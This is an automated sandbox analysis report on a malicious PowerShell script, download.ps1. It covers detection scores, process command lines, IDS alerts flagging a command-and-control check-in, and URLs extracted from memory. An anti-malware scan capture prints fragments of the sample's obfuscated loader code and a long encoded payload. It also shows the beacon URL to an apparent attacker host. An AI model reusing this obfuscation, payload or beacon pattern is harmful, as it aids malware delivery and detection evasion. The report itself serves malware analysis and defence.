Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1589104
MD5:81b74a62ffc263437801f0e3dbc1b1eb
SHA1:f1649560edbc7742352cec091f4dc26922d9bdcb
SHA256:9229403e77c223dc8acb86755f6576ff22ff15362da8b2577a85ed2083205e71
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6632, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6632, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T09:39:36.407884+010020577411A Network Trojan was detected192.168.2.74969945.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T09:39:36.407884+010018100002Potentially Bad Traffic192.168.2.74969945.61.136.13880TCP
2025-01-11T09:39:37.059944+010018100002Potentially Bad Traffic192.168.2.749700172.217.16.19680TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 15%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.4% probability
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1373186904.0000022C11518000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1410473801.0000022C2B590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1410473801.0000022C2B61C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1414936294.0000022C2B98C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32a source: powershell.exe, 00000000.00000002.1373186904.0000022C11518000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb1MC source: powershell.exe, 00000000.00000002.1410473801.0000022C2B61C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1413276114.0000022C2B89E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1412457364.0000022C2B7EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1410473801.0000022C2B590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1414936294.0000022C2B98C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb, source: powershell.exe, 00000000.00000002.1413763000.0000022C2B8E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.1410473801.0000022C2B5ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdb-Mo source: powershell.exe, 00000000.00000002.1410473801.0000022C2B61C000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.7:49699 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 172.217.16.196:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49699 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kmaealcfcalhcac.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kmaealcfcalhcac.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kmaealcfcalhcac.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C1498F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1411904683.0000022C2B6B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsofta
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C1498F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmaealcfcalhcac.top
Source: powershell.exe, 00000000.00000002.1373706201.0000022C1498F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmaealcfcalhcac.top/92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C15C03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C158FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C1590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C15C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1373706201.0000022C13481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14D2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1413763000.0000022C2B92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1373706201.0000022C13481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1400706287.0000022C23777000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C236E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1400706287.0000022C23657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C236E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1400706287.0000022C23777000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C236E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC4775660_2_00007FFAAC477566
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC4783120_2_00007FFAAC478312
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC46E9C00_2_00007FFAAC46E9C0
Source: classification engineClassification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mny3emhx.qam.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $2hk5joxacz80mi3.(([char[]]@((-7788+7855),(2142-(1655265/(4201325/(11789485/2287)))),(5896-5784),(9748-(47855817/4971)),(6494-(4206+(-1188+3392))),(344988/(31608360/(10006+(387040/(2088+(9123-8851))))))) -join ''))( $s98nu1tql0hxpyj ) $2hk5joxacz80mi3.((-join (@((-8433+8500),(3813-(2078+(6773201/(8288-4125)))),(320346/2886),(988770/(9710-(338048/304))),(129381/(9729-(53847552/(40443030/(10220-(15341125/3959)))))))| ForEach-Object { [char]$_ })))()$hmjer3wv2f7ykpl.(([char[]]@((383374/5722),(6167-(-185+(5809+435))),(-7725+7836),(-11+126),(10126-10025)) -join ''))()[byte[]] $gcw81akx7l463u2 = $s98nu1tql0hxpyj.(([char[]]@((-5268+5352),(3362-3251),(-4718+4783),(308712/(3749-1041)),(869136/(4966+2658)),(518562/(40511988/7578)),(5654-5533)) -join ''))() $u16t4qil590pz7d=$gcw81akx7l463u2 return $u16t4qil590pz7d}[System.Text.Encoding]::ascii.((-join (@((613582/8642),(-1445+1546),(715604/6169),(1738-(-7707+(66329770/(23104185/(4452-(4870-(-2231+(2609+(633792/192))))))))),(868376/(-369+7855)),(603288/5292),(2806-2701),(485-375),(150380/(7289-(12057-6228))))| ForEach-Object { [char]$_ })))((fm3l96o5ykb4tr27s0nvzqhwaiu "J7w7eXJxdGp3bpz7UVhvoAP3Sy3zkHIE+O/uwMvLEzU1flOntsQaT2IOfGgQfmH77r9pMX9m+V64Ef6U7o5+6KAZUEttdafh1NIfLJ0jIb2EgezQxytOjpCNhZv4wf74ZAtNAouMv4W9IJ4opggJo82o6zYs86/4pausJJ+uKFdPFMyE/cLNi4a0e0WsUk6cUMwsgtmISzWOn82Ck9yYhLeu2uTcwB4QN4GMhwt+whXMEkoejUjKmR0mY80UsUyUzeBUgm3HC7IdNZ3S31Ko4gGiQq7pCe6sVoDIrp9tPsSguBawi9xeoPSrPmVGQ+rzQ98dnNe06h2FhGcNomz9/M3mLJjPmwicAFhQdsPmYPxnDCp4ZE7IzR/EhQ/de8o+T0tqjsuoQz3UeYk331o6177MTREY4x+q7cBb1hj8I7/jlY36W95e08/9wZ2bmqRKf0ptjKyI0SzO5Y4yD1yKBIDADdfJiveRL8qStAIrUyX8Qc+Z9QAvqe4SvLnlPVh7fhma3iaSJiGDmHy5f6ruuy0L6nBYuX40cxv5gpSyyCfvcfb7r+VIZFXhbjXMYxze0GtoCwcciROUiY+QDHLUygxnBiSJEmeggnzU/zA+qVRUKK7FhoynnTigc78XiWUkp1zCCG7cukP3jDJwiTNdtrxZU8T0Ta49NubFuwsBFUYRiFrEk4Yep1XO8umAMzb2Yq5RqPAG75Oql9i+3sCMph+2q2LaY+CGWpsJaGWJ8npQgfpK/q7Gz2NfBwP9nV1WHwkCf0lFNs9iCYB0ZRal3EQuma/Pt3ze/5v4i+w0ZigWmIi8dn2ZB1xAn73eu22lakRgXVSmrHq0VULszm2RxNQ1RH42aKorAd0zgP3Ttu25uCdxCnmL/d5ShcSlpBwDr9pNQENfotFrZICgP/GavsaXOUFCHLjqGKlIVgT6wW9x+fnSqBZmAeWmvzieG7u7iIoEaFPLddy4J8qPFRAw0KDmmsnRCYacQcTUivkOS1QKVM6SyYTOsKeX0+d2ggYgx4zK/K2uyx2Krdiy8eTeqGfhxZGakIwYwt4dBR6XiZ3ozRagFxnExh4PTpAFkc2D0sKAltU278cdw4W/ahFs8dQ4rbJVEPOJTGeda0AYhbdgeT5QtxjFvr1uGhSKtqYPMShPPjpPENr3gasSP3r6p4ktBrxlV63zaq6F/RLuJlr/l9UwVYAq+diw53qzL/w0EfJaqOu6ESl3OmbhR4+v53kwt3U5upc6qnlTe+pmDgZGNs8iNrTInZw5AZgY9Ug2VzPZr4FLdTl91cR46gk3RonXa7ctVc5agk3KjbuqG5204f54VTr6homUnRDk9R4iyI42JspuhOKLJwCqnGQBdbpcH2HCfkHlKOWItlPdbD7B4AnjpDOSMhbuV6W60HjYTkoxWoCJVVGXqzXe+S2jN6SFInAsgWdtOPvufQR8xIIdZHHhaL2DXtWFt4DU8mt7sJjcmF93pRmZW3++OaifRQejwtC9ATITKzZ5S9eyOiPkPPGl8cwBd+ks958ApBhrzImy219ee2DV/Ja7qiZ+CsI/ITxxw3E0UO10jkFYEpG8gl+phH04CPzRGNzWvgl2j988hCnzdNiF+nUyXB1vrgAE89lWHnqOQQolS3qTnavd6yyUdq+cck7RPahMl32tDxkQA5HcBtlEzaEj8h/eA3kEdFanaL2C6Ak6ccWZGCl/7t36l9h2pqBmnAafVVaR9Ygq/VfgLRvFOwOnQxqLPd2qeyDyjiM/OPCBjlp38kZBFt3xIn3t1Nm+6oJjL7ijXqWV9kn5mNY0v4rIfu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
